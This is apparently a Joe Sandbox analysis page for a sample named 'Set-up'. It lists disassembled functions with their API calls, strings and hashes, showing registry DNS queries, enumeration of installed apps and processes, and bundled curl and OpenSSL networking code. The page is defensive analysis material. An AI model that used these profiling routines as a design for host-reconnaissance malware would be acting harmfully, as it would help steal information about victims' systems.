String ID:
API String ID: 846543921-0
Opcode ID: ebd45d5c022e0064f47000a12ba31fc54b669272f2e174247f58a5e4aa33891e
Instruction ID: 738a5d709e5fb472c3a396d759c9c834ce607f29d5ed19704715b7455e738902
Opcode Fuzzy Hash: ebd45d5c022e0064f47000a12ba31fc54b669272f2e174247f58a5e4aa33891e
Instruction Fuzzy Hash: 7AF01D75108348AFD2209F45DC48D6BBBEDFFC9754F05456EF958133119271AE10CA72

Function 005CA440 Relevance: 93.8, APIs: 43, Strings: 10, Instructions: 1038registrystringCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005CAA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CAA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 005CAA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005CAAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005CAB30
RegCloseKey.KERNELBASE(?), ref: 005CAB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 005CAB82
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CABAD
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CABF0
RegCloseKey.ADVAPI32(?), ref: 005CAC2A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 005CAC46
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 005CAC71
RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 005CACB4
RegCloseKey.ADVAPI32(?), ref: 005CACEE
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 005CAD0A
RegEnumKeyExA.KERNELBASE ref: 005CAD8D
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 005CADB0
RegCloseKey.KERNELBASE(?), ref: 005CADD9
RegEnumKeyExA.KERNELBASE ref: 005CAE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 005CAE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CAE54
RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 005CAEA3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 005CAF18
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 005CAF2C
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005CAF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005CAFB2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 005CB027
strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 005CB03B
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 005CB072
RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 005CB0C1

Strings

[%s]:%u%%%u, xrefs: 005CA77D
PrimaryDNSSuffix, xrefs: 005CAC6B, 005CACAE
[%s]:%u, xrefs: 005CA845
Software\Policies\Microsoft\System\DNSClient, xrefs: 005CAC3C
SearchList, xrefs: 005CAA46, 005CAA91, 005CABA7, 005CABEA, 005CAE4E, 005CAE9D
DhcpDomain, xrefs: 005CB06C, 005CB0BB
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 005CAA0F
Domain, xrefs: 005CAAE3, 005CAB2A, 005CAF5D, 005CAFAC
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 005CAB78
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 005CAD00

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
API String ID: 1856363200-4239849775
Opcode ID: f06cb7b4935ac3bb8ffb46a20f4a6c9544f56a98545a5c7d13e687af6f275ebb
Instruction ID: 4d146b3f77e56f2ba9ead9b3fc550d6be37338d52de99dfe78827998a6efebda
Opcode Fuzzy Hash: f06cb7b4935ac3bb8ffb46a20f4a6c9544f56a98545a5c7d13e687af6f275ebb
Instruction Fuzzy Hash: 558289B1604305AFE7209B64CC86F6B7BE8FF85704F14482CF986972A1E770E944CB92

Function 005D9740 Relevance: 32.2, APIs: 12, Strings: 6, Instructions: 736
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 005D978D
_stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 005D97BA
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005D97E4
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005D98A5
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 005D9920
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005D9946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 005D9974
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 005D9981
RegCloseKey.ADVAPI32(?), ref: 005D998B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 005D9992
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 005D97FE

Part of subcall function 005D78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,005DE16D,?), ref: 005D78AF
Part of subcall function 005D78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 005D78D9

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 005D9C46

Strings

System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 005D993C
\hos, xrefs: 005D999A
#, xrefs: 005D9A3F
#, xrefs: 005D9B9D
CARES_HOSTS, xrefs: 005D9788
DatabasePath, xrefs: 005D996B

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
API String ID: 3843116398-615551945
Opcode ID: 925e325aa25b3d15aed9b427491776ced4aecb77747155b19627614ae34df06d
Instruction ID: 69bae5806a154d8b8f528444a3c79c7ad6fee739179b0ef7a402bdf71f1f2db0
Opcode Fuzzy Hash: 925e325aa25b3d15aed9b427491776ced4aecb77747155b19627614ae34df06d
Instruction Fuzzy Hash: 8D3296B59042025FEB21AB68AC46B1B7FE4BF95314F08483AF84996362F731ED15C793

Function 00512F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00512FED
RegEnumKeyExA.KERNELBASE ref: 005131A5

Strings

d, xrefs: 00512FA0
index, xrefs: 00513112
SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00512F5D
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00512F49, 00512F71
installed_apps, xrefs: 00512F36
app_name, xrefs: 005130F0
DisplayName, xrefs: 005130BD
%s\%s, xrefs: 00513028

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: EnumOpen
String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
API String ID: 3231578192-3120786300
Opcode ID: ac6740096f0c37fcc677f6aa1fb36a18850f580a4d21d1f89b63da6ea2b19313
Instruction ID: 13b0e99c35bee68f6c7d491e9d1980e2cfad400d7aad6ac4ea8982ddfeac21ae
Opcode Fuzzy Hash: ac6740096f0c37fcc677f6aa1fb36a18850f580a4d21d1f89b63da6ea2b19313
Instruction Fuzzy Hash: BC71B6B49043199FDB00EF69C5847AEBBF0BF84318F10885DE99897341E7749A88CF92

Function 006EE5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE5E2
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 006EE5FA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 006EE637
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0067A31E), ref: 006EE64D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0067A31E,00000001,?,00000008,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000), ref: 006EE665
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE678
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE685
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE690
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0067A31E,?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E), ref: 006EE6A6
GetLastError.KERNEL32(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE6B0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 006EE6CC
GetLastError.KERNEL32(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE6E2
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0067A31E,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE6FA

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
String ID:
API String ID: 2867842857-0
Opcode ID: 8d70fdc4dc156fd204aa263c85dd1993a89af69243e03ef498f231245ae14020
Instruction ID: 40d3fa2aea0564e223ab2343972336c4315511ceecca6309856bf3778ca9285c
Opcode Fuzzy Hash: 8d70fdc4dc156fd204aa263c85dd1993a89af69243e03ef498f231245ae14020
Instruction Fuzzy Hash: 9C31A375601341BFEB206B76DC49F6A376AFB55711F148528F916C92D0EA329900CB62

Function 00548B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00548C2F
WSAGetLastError.WS2_32 ref: 00548C39
SleepEx.KERNELBASE(00000000,00000000), ref: 00548CF3
getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00548D0E
WSAGetLastError.WS2_32 ref: 00548D18
WSASetLastError.WS2_32(00000000), ref: 00548E0C

Strings

local address %s port %d..., xrefs: 00548C7F
cf-socket.c, xrefs: 00548EDF
connect to %s port %u from %s port %d failed: %s, xrefs: 00548E78
connected, xrefs: 00548DA7
not connected yet, xrefs: 00548BDC

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLast$Sleepconnectgetsockopt
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 2513251565-879669977
Opcode ID: e60fa973f57828f37d1972baa41cda535c62767195a6d61a596516ddb7691166
Instruction ID: 7ef9787b0cbd3bede40fe1cad566601e4b393a012a3cf052794b30986cd984bc
Opcode Fuzzy Hash: e60fa973f57828f37d1972baa41cda535c62767195a6d61a596516ddb7691166
Instruction Fuzzy Hash: 7EB1A074604706AFDB10DF24C889BBABFE4BF45318F048929E8598B2D2DB71EC55C761

Function 005176A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?), ref: 005176DE
send.WS2_32(multi.c,?,?,?), ref: 005176EA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00517721
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00517745
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051774D

Strings

N=Q, xrefs: 005176A3
SEND %s:%d send(%lu) = %ld, xrefs: 005176F8
LIMIT %s:%d %s reached memlimit, xrefs: 00517712, 00517731
multi.c, xrefs: 005176DD, 005176E9
send, xrefs: 0051770B, 0051772A

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: send$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$N=Q$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 3540913164-1404432422
Opcode ID: 5dcdd38a008d4981715a7f0c42af303c1c97adb3bd8e6e3dc78f4f8d7b247c07
Instruction ID: 159ed3478328f49e43ecc166234c56d0cf9153cb0f8520ab33979565af24bdef
Opcode Fuzzy Hash: 5dcdd38a008d4981715a7f0c42af303c1c97adb3bd8e6e3dc78f4f8d7b247c07
Instruction Fuzzy Hash: 6411B9B49087187BE110ABA9AC4DF6F7F6CFB8BB68F040908F90957251D7719C4086B1

Function 006947B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE5E2
Part of subcall function 006EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 006EE5FA
Part of subcall function 006EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 006EE637
Part of subcall function 006EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0067A31E), ref: 006EE64D
Part of subcall function 006EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0067A31E,00000001,?,00000008,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000), ref: 006EE665
Part of subcall function 006EE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE678
Part of subcall function 006EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE685
Part of subcall function 006EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E,?,00B54AB4), ref: 006EE690
Part of subcall function 006EE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0067A31E,?,?,?,?,00000000,006947C4,?,00000000,00000000,00000000,?,00000000,?,0067A31E), ref: 006EE6A6

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00B54AB4), ref: 006947CC
GetLastError.KERNEL32(?,?,?,?,?,?,00B54AB4), ref: 0069483D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00B54AB4), ref: 00694855
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00B54AB4), ref: 00694860
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00B54AB4), ref: 0069488E

Strings

crypto/bio/bss_file.c, xrefs: 00694830, 00694877, 006948A4
BIO_new_file, xrefs: 00694829, 00694870, 0069489D
calling fopen(%s, %s), xrefs: 00694845

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
API String ID: 3063597995-203430365
Opcode ID: a8e252d910808f8a602bef18b8f1a5b0add6c53331586488d88843a92b7b5844
Instruction ID: e4708ca1d193110fa10222fb18ae1daa17c2f20745088c335142113b2c50cf7a
Opcode Fuzzy Hash: a8e252d910808f8a602bef18b8f1a5b0add6c53331586488d88843a92b7b5844
Instruction Fuzzy Hash: C72125A5F883407BE5A032643C07F2F368EDB52B49F0801A8FD09A42C3ED55991A45B7

Function 005131D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 005131EF
Process32First.KERNEL32 ref: 00513245
Process32Next.KERNEL32 ref: 005132CC
CloseHandle.KERNELBASE ref: 005132E7

Strings

processes, xrefs: 005132F3
pid, xrefs: 00513297
name, xrefs: 00513272
CreateToolhelp32Snapshot failed., xrefs: 0051320E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
